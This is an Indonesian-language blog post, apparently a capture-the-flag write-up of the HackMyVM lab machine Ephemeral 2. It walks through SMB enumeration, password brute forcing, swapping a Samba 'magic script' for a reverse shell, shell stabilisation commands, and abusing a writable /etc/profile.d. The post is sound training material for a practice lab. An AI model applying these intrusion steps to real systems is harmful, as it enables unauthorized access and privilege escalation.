<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HackMyVM: Ephemeral 2 | sharpicx</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="HackMyVM: Ephemeral 2" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Enumerasi SMB menggunakan enum4linux untuk mendapatkan user-usernya lalu mulai brute force untuk bisa akses ke CIFS (Common Internet File System) lalu mounting dan replacing reverse shell ke dalam mounted directory yang di dalamnya terdapat script dijalankan secara automasi bernama smbscript.elf. Dan setelahnya boleh disimak lebih dalam lagi mengenai pembahasan mesin Ephemeral seri ke dua dengan difficulty Medium dari HackMyVM. dibuat oleh Proxy. seri pertama malah dua minggu kemudian baru saya garap. setelah blog ini rilis, baru ada kayanya." />
<meta property="og:description" content="Enumerasi SMB menggunakan enum4linux untuk mendapatkan user-usernya lalu mulai brute force untuk bisa akses ke CIFS (Common Internet File System) lalu mounting dan replacing reverse shell ke dalam mounted directory yang di dalamnya terdapat script dijalankan secara automasi bernama smbscript.elf. Dan setelahnya boleh disimak lebih dalam lagi mengenai pembahasan mesin Ephemeral seri ke dua dengan difficulty Medium dari HackMyVM. dibuat oleh Proxy. seri pertama malah dua minggu kemudian baru saya garap. setelah blog ini rilis, baru ada kayanya." />
<link rel="canonical" href="http://localhost:4000/2022/05/01/hmv-ephemeral2" />
<meta property="og:url" content="http://localhost:4000/2022/05/01/hmv-ephemeral2" />
<meta property="og:site_name" content="sharpicx" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-05-01T00:00:00+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HackMyVM: Ephemeral 2" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-05-01T00:00:00+07:00","datePublished":"2022-05-01T00:00:00+07:00","description":"Enumerasi SMB menggunakan enum4linux untuk mendapatkan user-usernya lalu mulai brute force untuk bisa akses ke CIFS (Common Internet File System) lalu mounting dan replacing reverse shell ke dalam mounted directory yang di dalamnya terdapat script dijalankan secara automasi bernama smbscript.elf. Dan setelahnya boleh disimak lebih dalam lagi mengenai pembahasan mesin Ephemeral seri ke dua dengan difficulty Medium dari HackMyVM. dibuat oleh Proxy. seri pertama malah dua minggu kemudian baru saya garap. setelah blog ini rilis, baru ada kayanya.","headline":"HackMyVM: Ephemeral 2","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2022/05/01/hmv-ephemeral2"},"url":"http://localhost:4000/2022/05/01/hmv-ephemeral2"}</script>
<!-- End Jekyll SEO tag -->


<meta name="keywords" content="smb-login-check,cifs,cronjob,profile.d-writable,ssh" />

<link rel="shortcut icon" href="/favicon.ico" />
<link rel="apple-touch-icon" href="/favicon.ico"/>
<link rel="alternate" type="application/rss+xml" title="sharpicx - linux & cybersecurity big fan " href="/feed.xml" />
<link rel="stylesheet" type="text/css" href="/assets/css/base.css" />
<link rel="stylesheet" type="text/css" href="/assets/css/highlight.css" />
<!-- <link rel="stylesheet" href="https://hackerthemes.com/bootstrap-themes/demo/theme-machine/neon-glow/css/bootstrap4-neon-glow.min.css"> -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">

<!--[if lt IE 9]>
  <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->


<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async ></script>


<script src="/assets/script/jekyllpaper.js" async ></script>
<script src="https://unpkg.com/mermaid@8.5.1/dist/mermaid.min.js" onload="javascript:loadMermaid();" async></script>


</head>
<body>
  <div class="container-wrapper">
    <header class="container-header">
      <div class="header-info">
  <span class="header-info-name">sharpicx</span><br/>
  <span class="header-info-desc" style="padding-left: 25px">linux & cybersecurity big fan </span>
</div>
<nav class="header-nav">
  <ul class="header-main-nav">
  
    <li class="header-main-nav-item"><a href="/">home</a></li>
  
    <li class="header-main-nav-item"><a href="/category">categories</a></li>
  
    <li class="header-main-nav-item"><a href="/about">whoami</a></li>
  
  </ul>
</nav>

    </header>
    <main class="container-main">
      <article class="container-post">
  <div class="post-title" style="padding: 0px 0px 20px 0px">
    <h1>HackMyVM: Ephemeral 2</h1>
  </div>
  <div class="post-author">
    <span>sharpicx</span>
  </div>
  <div class="post-content">
    <p>Enumerasi SMB menggunakan <em>enum4linux</em> untuk mendapatkan <em>user-user</em>nya lalu mulai <em>brute force</em> untuk bisa akses ke <strong>CIFS</strong> (<em>Common Internet File System</em>) lalu mounting dan replacing <em>reverse shell</em> ke dalam <em>mounted directory</em> yang 
di dalamnya terdapat script dijalankan secara automasi bernama <strong>smbscript.elf</strong>. Dan setelahnya boleh disimak lebih dalam lagi mengenai pembahasan mesin <em>Ephemeral</em> seri ke dua
dengan difficulty <strong>Medium</strong> dari <a href="https://hackmyvm.eu">HackMyVM</a>. dibuat oleh <a href="https://hackmyvm.eu/profile/?user=Proxy">Proxy</a>. seri pertama malah dua minggu kemudian baru saya garap. 
setelah blog ini rilis, baru ada kayanya.</p>

<p><img src="https://i.postimg.cc/Jn9khzPL/image.png" alt="damn" /></p>

<p><img src="https://i.postimg.cc/Jhp3R8fr/image.png" alt="root" /></p>

<h2 id="recon">Recon</h2>

<p>Hasil scan disini adalah, SSH (22), HTTP (80), SMB (139), SMB (445).</p>
<div class="language-cs highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">PORT</span>    <span class="n">STATE</span> <span class="n">SERVICE</span>     <span class="n">REASON</span>  <span class="n">VERSION</span>
<span class="m">22</span><span class="p">/</span><span class="n">tcp</span>  <span class="n">open</span>  <span class="n">ssh</span>         <span class="n">syn</span><span class="p">-</span><span class="n">ack</span> <span class="n">OpenSSH</span> <span class="m">8.2</span><span class="n">p1</span> <span class="n">Ubuntu</span> <span class="m">4u</span><span class="n">buntu0</span><span class="p">.</span><span class="m">4</span> <span class="p">(</span><span class="n">Ubuntu</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">protocol</span> <span class="m">2.0</span><span class="p">)</span>
<span class="p">|</span> <span class="n">ssh</span><span class="p">-</span><span class="n">hostkey</span><span class="p">:</span>
<span class="p">|</span>   <span class="m">3072</span> <span class="m">0</span><span class="n">a</span><span class="p">:</span><span class="n">cc</span><span class="p">:</span><span class="n">f1</span><span class="p">:</span><span class="m">53</span><span class="p">:</span><span class="m">7</span><span class="n">e</span><span class="p">:</span><span class="m">6</span><span class="n">b</span><span class="p">:</span><span class="m">31</span><span class="p">:</span><span class="m">2</span><span class="n">c</span><span class="p">:</span><span class="m">10</span><span class="p">:</span><span class="m">1</span><span class="n">e</span><span class="p">:</span><span class="m">6d</span><span class="p">:</span><span class="n">bc</span><span class="p">:</span><span class="m">01</span><span class="p">:</span><span class="n">b1</span><span class="p">:</span><span class="n">c3</span><span class="p">:</span><span class="nf">a2</span> <span class="p">(</span><span class="n">RSA</span><span class="p">)</span>
<span class="p">|</span> <span class="n">ssh</span><span class="p">-</span><span class="n">rsa</span> <span class="n">AAAAB3NzaC1yc2EAAAADAQABAAABgQC4EkKlQsLoJ</span><span class="p">+</span><span class="n">r82mQnd6FWkjL2Ry4tLVriMceGPvzHNFlbbkpa7kkAIf3TtOp7Tads45gLfrNVTC98MHegGZwvL3aIaFPp0LodGxJeQG2lgudoWY9M5sfLMd5oUpcykWXcZfpibQVVhQSpPg4tIpWRVrIKZrBo2CxV8XsRh5RevdNZzzJ6w3D8zuwaBkHD7KI</span><span class="p">+</span><span class="m">2</span><span class="n">eaiuAYrmEkbUVHLkstY</span><span class="p">/</span><span class="n">nHclJwsDBMkx</span><span class="p">+</span><span class="n">u4gv7Rz3S37gmYhg8a74iZqqFpDF47AJ8fcC3k6pXQr3iArgpOU2Rc20THgwn8nRBit2CzO9C5DIf1KvoKIlNftYXK</span><span class="p">+</span><span class="n">Wnw2FmIGUmF7YxjC3ys1uXDahRjcW6EKZpRb2XKzPNtfoR</span><span class="p">+</span><span class="n">sdOPvLJkcXubn5</span><span class="p">/</span><span class="n">HTuy5HKmfk7cByX6</span><span class="p">/</span><span class="m">6</span><span class="n">KwYau11OxrM87YL</span><span class="p">+</span><span class="n">Fyl0VUobTKrC3570aaFamtWCd</span><span class="p">/</span><span class="n">A7oB3xsxQ8pSr7l2Pjx</span><span class="p">+</span><span class="m">20</span><span class="n">BSGjvw7dkMG1Yecf</span><span class="p">/</span><span class="m">79D</span><span class="n">b9f</span><span class="p">+</span><span class="n">DvxrLEIUOxRUWAGijr</span><span class="p">++</span><span class="n">Ar5s88</span><span class="p">=</span>
<span class="p">|</span>   <span class="m">256</span> <span class="n">cd</span><span class="p">:</span><span class="m">19</span><span class="p">:</span><span class="m">04</span><span class="p">:</span><span class="n">a0</span><span class="p">:</span><span class="n">d1</span><span class="p">:</span><span class="m">8</span><span class="n">a</span><span class="p">:</span><span class="m">8</span><span class="n">b</span><span class="p">:</span><span class="m">3d</span><span class="p">:</span><span class="m">3</span><span class="n">e</span><span class="p">:</span><span class="m">17</span><span class="p">:</span><span class="n">ee</span><span class="p">:</span><span class="m">21</span><span class="p">:</span><span class="m">5d</span><span class="p">:</span><span class="n">cd</span><span class="p">:</span><span class="m">6</span><span class="n">e</span><span class="p">:</span><span class="m">49</span> <span class="p">(</span><span class="n">ECDSA</span><span class="p">)</span>
<span class="p">|</span> <span class="n">ecdsa</span><span class="p">-</span><span class="n">sha2</span><span class="p">-</span><span class="n">nistp256</span> <span class="n">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBlMZBD50d94mQuFM4n2frVjcsaG1yWdXgHdmKBMNddOg9M67uUbNp8jHiwF</span><span class="p">/</span><span class="n">XQ36yiBGxPXWvvGoxI4oM97c3M</span><span class="p">=</span>
<span class="p">|</span>   <span class="m">256</span> <span class="n">e5</span><span class="p">:</span><span class="m">6</span><span class="n">a</span><span class="p">:</span><span class="m">27</span><span class="p">:</span><span class="m">39</span><span class="p">:</span><span class="n">ed</span><span class="p">:</span><span class="n">a8</span><span class="p">:</span><span class="n">c9</span><span class="p">:</span><span class="m">03</span><span class="p">:</span><span class="m">46</span><span class="p">:</span><span class="n">f2</span><span class="p">:</span><span class="n">a5</span><span class="p">:</span><span class="m">8</span><span class="n">c</span><span class="p">:</span><span class="m">87</span><span class="p">:</span><span class="m">85</span><span class="p">:</span><span class="m">44</span><span class="p">:</span><span class="m">9</span><span class="nf">e</span> <span class="p">(</span><span class="n">ED25519</span><span class="p">)</span>
<span class="p">|</span><span class="n">_ssh</span><span class="p">-</span><span class="n">ed25519</span> <span class="n">AAAAC3NzaC1lZDI1NTE5AAAAIBwwUJchIYxvumcFeCwJ4yZnFQPfYLQj3dnAKrIU4j</span><span class="p">+</span><span class="m">1</span>
<span class="m">80</span><span class="p">/</span><span class="n">tcp</span>  <span class="n">open</span>  <span class="n">http</span>        <span class="n">syn</span><span class="p">-</span><span class="n">ack</span> <span class="n">Apache</span> <span class="n">httpd</span> <span class="m">2.4</span><span class="p">.</span><span class="m">41</span> <span class="p">((</span><span class="n">Ubuntu</span><span class="p">))</span>
<span class="p">|</span><span class="n">_http</span><span class="p">-</span><span class="n">server</span><span class="p">-</span><span class="n">header</span><span class="p">:</span> <span class="n">Apache</span><span class="p">/</span><span class="m">2.4</span><span class="p">.</span><span class="m">41</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span>
<span class="p">|</span> <span class="n">http</span><span class="p">-</span><span class="n">methods</span><span class="p">:</span>
<span class="p">|</span><span class="n">_</span>  <span class="n">Supported</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">POST</span> <span class="n">OPTIONS</span> <span class="n">HEAD</span> <span class="n">GET</span>
<span class="p">|</span><span class="n">_http</span><span class="p">-</span><span class="n">title</span><span class="p">:</span> <span class="n">Apache2</span> <span class="n">Ubuntu</span> <span class="n">Default</span> <span class="n">Page</span><span class="p">:</span> <span class="n">It</span> <span class="n">works</span>
<span class="m">139</span><span class="p">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">netbios</span><span class="p">-</span><span class="n">ssn</span> <span class="n">syn</span><span class="p">-</span><span class="n">ack</span> <span class="n">Samba</span> <span class="n">smbd</span> <span class="m">4.6</span><span class="p">.</span><span class="m">2</span>
<span class="m">445</span><span class="p">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">netbios</span><span class="p">-</span><span class="n">ssn</span> <span class="n">syn</span><span class="p">-</span><span class="n">ack</span> <span class="n">Samba</span> <span class="n">smbd</span> <span class="m">4.6</span><span class="p">.</span><span class="m">2</span>
<span class="n">Service</span> <span class="n">Info</span><span class="p">:</span> <span class="n">OS</span><span class="p">:</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">CPE</span><span class="p">:</span> <span class="n">cpe</span><span class="p">:/</span><span class="n">o</span><span class="p">:</span><span class="n">linux</span><span class="p">:</span><span class="n">linux_kernel</span>

<span class="n">Host</span> <span class="n">script</span> <span class="n">results</span><span class="p">:</span>
<span class="p">|</span><span class="n">_clock</span><span class="p">-</span><span class="n">skew</span><span class="p">:</span> <span class="m">6</span><span class="n">h59m57s</span>
<span class="p">|</span> <span class="n">smb2</span><span class="p">-</span><span class="n">security</span><span class="p">-</span><span class="n">mode</span><span class="p">:</span>
<span class="p">|</span>   <span class="m">3.1</span><span class="p">.</span><span class="m">1</span><span class="p">:</span>
<span class="p">|</span><span class="n">_</span>    <span class="n">Message</span> <span class="n">signing</span> <span class="n">enabled</span> <span class="n">but</span> <span class="n">not</span> <span class="n">required</span>
<span class="p">|</span> <span class="n">p2p</span><span class="p">-</span><span class="n">conficker</span><span class="p">:</span>
<span class="p">|</span>   <span class="n">Checking</span> <span class="k">for</span> <span class="n">Conficker</span><span class="p">.</span><span class="n">C</span> <span class="n">or</span> <span class="n">higher</span><span class="p">...</span>
<span class="p">|</span>   <span class="n">Check</span> <span class="m">1</span> <span class="p">(</span><span class="n">port</span> <span class="m">61913</span><span class="p">/</span><span class="n">tcp</span><span class="p">):</span> <span class="nf">CLEAN</span> <span class="p">(</span><span class="n">Couldn</span><span class="err">'</span><span class="n">t</span> <span class="n">connect</span><span class="p">)</span>
<span class="p">|</span>   <span class="n">Check</span> <span class="m">2</span> <span class="p">(</span><span class="n">port</span> <span class="m">63451</span><span class="p">/</span><span class="n">tcp</span><span class="p">):</span> <span class="nf">CLEAN</span> <span class="p">(</span><span class="n">Couldn</span><span class="err">'</span><span class="n">t</span> <span class="n">connect</span><span class="p">)</span>
<span class="p">|</span>   <span class="n">Check</span> <span class="m">3</span> <span class="p">(</span><span class="n">port</span> <span class="m">53498</span><span class="p">/</span><span class="n">udp</span><span class="p">):</span> <span class="nf">CLEAN</span> <span class="p">(</span><span class="n">Failed</span> <span class="n">to</span> <span class="n">receive</span> <span class="n">data</span><span class="p">)</span>
<span class="p">|</span>   <span class="n">Check</span> <span class="m">4</span> <span class="p">(</span><span class="n">port</span> <span class="m">7279</span><span class="p">/</span><span class="n">udp</span><span class="p">):</span> <span class="nf">CLEAN</span> <span class="p">(</span><span class="n">Failed</span> <span class="n">to</span> <span class="n">receive</span> <span class="n">data</span><span class="p">)</span>
<span class="p">|</span><span class="n">_</span>  <span class="m">0</span><span class="p">/</span><span class="m">4</span> <span class="n">checks</span> <span class="n">are</span> <span class="n">positive</span><span class="p">:</span> <span class="n">Host</span> <span class="k">is</span> <span class="n">CLEAN</span> <span class="n">or</span> <span class="n">ports</span> <span class="n">are</span> <span class="n">blocked</span>
<span class="p">|</span> <span class="n">smb2</span><span class="p">-</span><span class="n">time</span><span class="p">:</span>
<span class="p">|</span>   <span class="n">date</span><span class="p">:</span> <span class="m">2022</span><span class="p">-</span><span class="m">05</span><span class="p">-</span><span class="m">18</span><span class="n">T20</span><span class="p">:</span><span class="m">32</span><span class="p">:</span><span class="m">16</span>
<span class="p">|</span><span class="n">_</span>  <span class="n">start_date</span><span class="p">:</span> <span class="n">N</span><span class="p">/</span><span class="n">A</span>
<span class="p">|</span> <span class="n">nbstat</span><span class="p">:</span> <span class="n">NetBIOS</span> <span class="n">name</span><span class="p">:</span> <span class="n">EPHEMERAL</span><span class="p">,</span> <span class="n">NetBIOS</span> <span class="n">user</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unknown</span><span class="p">&gt;,</span> <span class="n">NetBIOS</span> <span class="n">MAC</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unknown</span><span class="p">&gt;</span> <span class="p">(</span><span class="n">unknown</span><span class="p">)</span>
<span class="p">|</span> <span class="n">Names</span><span class="p">:</span>
<span class="p">|</span>   <span class="n">EPHEMERAL</span><span class="p">&lt;</span><span class="m">00</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unique</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="n">EPHEMERAL</span><span class="p">&lt;</span><span class="m">03</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unique</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="n">EPHEMERAL</span><span class="p">&lt;</span><span class="m">20</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unique</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="err">\</span><span class="n">x01</span><span class="err">\</span><span class="n">x02__MSBROWSE__</span><span class="err">\</span><span class="n">x02</span><span class="p">&lt;</span><span class="m">01</span><span class="p">&gt;</span>  <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="k">group</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="n">WORKGROUP</span><span class="p">&lt;</span><span class="m">00</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="k">group</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="n">WORKGROUP</span><span class="p">&lt;</span><span class="m">1d</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">unique</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span>   <span class="n">WORKGROUP</span><span class="p">&lt;</span><span class="m">1</span><span class="n">e</span><span class="p">&gt;</span>        <span class="n">Flags</span><span class="p">:</span> <span class="p">&lt;</span><span class="k">group</span><span class="p">&gt;&lt;</span><span class="n">active</span><span class="p">&gt;</span>
<span class="p">|</span> <span class="n">Statistics</span><span class="p">:</span>
<span class="p">|</span>   <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span>
<span class="p">|</span>   <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span>
<span class="p">|</span><span class="n">_</span>  <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span>

</code></pre></div></div>
<p>kalau kaya gini biasanya saya sudah paham, langsung <em>smbmap</em> atau <em>enum4linux</em> untuk enumerasi lebih lanjut.</p>

<h2 id="--443-smb-enumeration">-&gt; 443: SMB Enumeration</h2>

<div class="language-cs highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">---&lt;</span><span class="n">redirected</span><span class="p">&gt;---</span>

<span class="p">=================================(</span> <span class="n">Share</span> <span class="n">Enumeration</span> <span class="k">on</span> <span class="m">192.168</span><span class="p">.</span><span class="m">56.13</span> <span class="p">)=================================</span>

<span class="n">Can</span><span class="err">'</span><span class="n">t</span> <span class="n">load</span> <span class="p">/</span><span class="n">etc</span><span class="p">/</span><span class="n">samba</span><span class="p">/</span><span class="n">smb</span><span class="p">.</span><span class="n">conf</span> <span class="p">-</span> <span class="n">run</span> <span class="n">testparm</span> <span class="n">to</span> <span class="n">debug</span> <span class="n">it</span>

        <span class="n">Sharename</span>       <span class="n">Type</span>      <span class="n">Comment</span>
        <span class="p">---------</span>       <span class="p">----</span>      <span class="p">-------</span>
        <span class="n">print</span><span class="err">$</span>          <span class="n">Disk</span>      <span class="n">Printer</span> <span class="n">Drivers</span>
        <span class="n">SYSADMIN</span>        <span class="n">Disk</span>
        <span class="n">IPC</span><span class="err">$</span>            <span class="n">IPC</span>       <span class="n">IPC</span> <span class="nf">Service</span> <span class="p">(</span><span class="n">ephemeral</span> <span class="nf">server</span> <span class="p">(</span><span class="n">Samba</span><span class="p">,</span> <span class="n">Ubuntu</span><span class="p">))</span>
        <span class="n">Officejet_Pro_8600_CDECA1_</span> <span class="n">Printer</span>
<span class="n">SMB1</span> <span class="n">disabled</span> <span class="p">--</span> <span class="n">no</span> <span class="n">workgroup</span> <span class="n">available</span>

<span class="p">[+]</span> <span class="n">Attempting</span> <span class="n">to</span> <span class="n">map</span> <span class="n">shares</span> <span class="k">on</span> <span class="m">192.168</span><span class="p">.</span><span class="m">56.13</span>

<span class="c1">//192.168.56.13/print$  Mapping: DENIED Listing: N/A Writing: N/A</span>
<span class="c1">//192.168.56.13/SYSADMIN        Mapping: DENIED Listing: N/A Writing: N/A</span>

<span class="p">---&lt;</span><span class="n">redirected</span><span class="p">&gt;---</span>

<span class="p">[+]</span> <span class="n">Enumerating</span> <span class="n">users</span> <span class="k">using</span> <span class="nn">SID</span> <span class="n">S</span><span class="p">-</span><span class="m">1</span><span class="p">-</span><span class="m">22</span><span class="p">-</span><span class="m">1</span> <span class="n">and</span> <span class="n">logon</span> <span class="n">username</span> <span class="err">''</span><span class="p">,</span> <span class="n">password</span> <span class="err">''</span>

<span class="n">S</span><span class="p">-</span><span class="m">1</span><span class="p">-</span><span class="m">22</span><span class="p">-</span><span class="m">1</span><span class="p">-</span><span class="m">1000</span> <span class="n">Unix</span> <span class="n">User</span><span class="err">\</span><span class="nf">randy</span> <span class="p">(</span><span class="n">Local</span> <span class="n">User</span><span class="p">)</span>
<span class="n">S</span><span class="p">-</span><span class="m">1</span><span class="p">-</span><span class="m">22</span><span class="p">-</span><span class="m">1</span><span class="p">-</span><span class="m">1001</span> <span class="n">Unix</span> <span class="n">User</span><span class="err">\</span><span class="nf">ralph</span> <span class="p">(</span><span class="n">Local</span> <span class="n">User</span><span class="p">)</span>

</code></pre></div></div>

<p><img src="https://i.postimg.cc/5tqSHvDm/image.png" alt="lmfao" /></p>

<p>ada 2 local unix user di mesin ini (randy, ralph), dan 2 directory shares yang bisa dijadikan untuk jalan selanjutnya. Tapi keduanya mempunyai status <strong>DENIED</strong> yang artinya jika ingin 
mengakses directory itu harus login ke SMB shellnya. maka dengan begitu saya mencoba untuk <em>brute force</em> agar bisa mengakses SMB ini dan play around.
2 user tadi saya save menjadi text.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>╭─ via <span class="o">[</span>machines/ephemeral2] ‹node-›  ‹› 
╰─ <span class="nb">echo</span> <span class="nt">-e</span> <span class="s1">'randy\nralph'</span> <span class="o">&gt;</span> users.txt
</code></pre></div></div>

<h2 id="--obtaining-the-password">-&gt; Obtaining the password</h2>

<p>Open <em>msfconsole</em> and then use the auxiliary of <em>smb_login</em> as the scanning tool.</p>

<p><img src="https://i.postimg.cc/Wpyx8LfJ/image.png" alt="iaka" /></p>

<p>and then i inserted a run command and hit the enter key</p>

<p><img src="https://i.postimg.cc/jdPwdTpH/image.png" alt="asda" /></p>

<p>waw, okay, dengan begini saya mendapatkan password dari <em>randy</em>, dan password yang dibawahnya itu mungkin salah (spoiler). lalu saya login SMB dan mencoba dengan password yang <em>success</em> itu.
tetap sama aja yang berhasil hanya <em>randy</em>, mungkin <em>metasploit</em> baru ngebug atau apa kurang tau juga saya.</p>

<h2 id="shell-as-randy">shell as randy</h2>

<p><img src="https://i.postimg.cc/ht8dMnMD/image.png" alt="image" /></p>

<p>saya download semua file itu, dan saya letakkan dalam folder baru lagi untuk membuat isi-isinya terorganisir tidak tercampur ke yang lainnya. <br /> 
menariknya pada file <em>smb.conf</em>, saya jadi tertarik untuk mengetahui apa yang dimaksud <em>magic script</em> oleh konfigurasi dibawah ini.</p>
<div class="language-conf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<span class="n">SYSADMIN</span>]

<span class="n">path</span> = /<span class="n">home</span>/<span class="n">randy</span>/<span class="n">smbshare</span>
<span class="n">valid</span> <span class="n">users</span> = <span class="n">randy</span>
<span class="n">browsable</span> = <span class="n">yes</span>
<span class="n">writeable</span> = <span class="n">yes</span>
<span class="n">read</span> <span class="n">only</span> = <span class="n">no</span>
<span class="n">magic</span> <span class="n">script</span> = <span class="n">smbscript</span>.<span class="n">elf</span>
<span class="n">guest</span> <span class="n">ok</span> = <span class="n">yes</span>
</code></pre></div></div>
<p>setelah itu, saya jadi teringat bahwasannya ini bisa dimounting ke local karena termasuk <em>CIFS</em>, lalu saya coba lah dengan command.</p>

<p><img src="https://i.postimg.cc/Y97RC89R/image.png" alt="img" /></p>

<p>lalu setelah itu saya berniat untuk membuat rev-shell untuk mencoba dan mencari tahu apakah <em>magic script</em> ini bebas untuk diisi apa aja, karena berbentuk ELF jadi ya executable lah jelas.
dan disambi dengan listening port pake <em>ncat</em>.</p>

<p><img src="https://i.postimg.cc/RFPsF8Ym/image.png" alt="lmfao" /></p>

<p><img src="https://i.postimg.cc/d329CxHD/image.png" alt="lmfao2" /></p>

<h2 id="shell-as-ralph">shell as ralph</h2>

<p>sebelum itu seperti biasa untuk stabilize shell.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm-color
<span class="nv">$ </span>python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("bash")'</span>

<span class="c">#---send it to the background ^C-z---</span>
<span class="nv">$ </span><span class="nb">stty</span> <span class="nt">-a</span><span class="p">;</span> <span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg</span>

<span class="nt">---victim</span> revshell---
<span class="nv">$ </span><span class="nb">stty </span>rows 47 cols 112
</code></pre></div></div>
<p><img src="https://i.postimg.cc/YqwqmhZD/image.png" alt="waw" /></p>

<p>it’s time to enumerate more stuff di mesin ini, menggunakan <em>LinPEAS</em> haha.
tapi sebelumnya alangkah sehatnya kalau saya masuk ke sistem menggunakan ssh saja agar tidak terjadi crash pada mounted directory. jadi kalau begitu saya copy ssh <em>private key</em> ke <em>randy’s ssh directory</em></p>

<p><img src="https://i.postimg.cc/dtWpcf2R/image.png" alt="wget" /></p>

<p>lalu, saya masuk lewat ssh agar jalur lebih aman dan lebih stabil hehe.</p>

<p><img src="https://i.postimg.cc/QtrnqZDD/image.png" alt="apapun" /></p>

<p>demi apapun, sepertinya tidak ada gunanya saya tulis metode untuk membuat stable shell, hadeh. Okay, back to the topic.<br />
Ketika saya sudah seleai menjalankan <em>LinPEAS</em> lalu sayapun bergegas melihat output dari hasil scanning si script ini. Waw, betapa menariknya ada cronjob menajalankan script <em>ssh.sh</em> dari user <em>ralph</em>.</p>

<p><img src="https://i.postimg.cc/h4CRKhg7/image.png" alt="cron" /></p>

<p>ketika saya lihat, isi dari script ini ya sama sih intinya sama seperti nama scriptnya.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>


/usr/bin/ssh <span class="nt">-o</span> <span class="s2">"StrictHostKeyChecking no"</span> ralph@localhost <span class="nt">-i</span> /home/ralph/.ssh/id_rsa
</code></pre></div></div>
<p>lalu saya coba cek lagi apakah ada cara untuk <em>abuse</em> script diatas. dan saya menemukan <em>privilege</em> untuk user <em>randy</em> bisa write pada directory <strong>profile.d</strong>. yang kalau kita telurusi dari <strong>hacktricks</strong> official kira-kira seperti ini dalihnya.</p>

<p><img src="https://i.postimg.cc/ZKKYL1Y6/image.png" alt="imageya" /></p>

<p>yang mana artinya,</p>
<blockquote>
  <p>file pada <strong>/etc/profile</strong> atau file-file pada <strong>/etc/profile.d</strong> adalah script-script yang bisa dieksekusi ketika suatu user menjalankan sebuah shell baru. Oleh karenanya, jika kamu bisa menulis atau memodifikasi diantara file itu jika kau memiliki privilege.</p>
</blockquote>

<p>maka tanpa banyak berpikir, saya membuat rev-shell dan diletakkan dalam <strong>/etc/profile.d</strong>.</p>
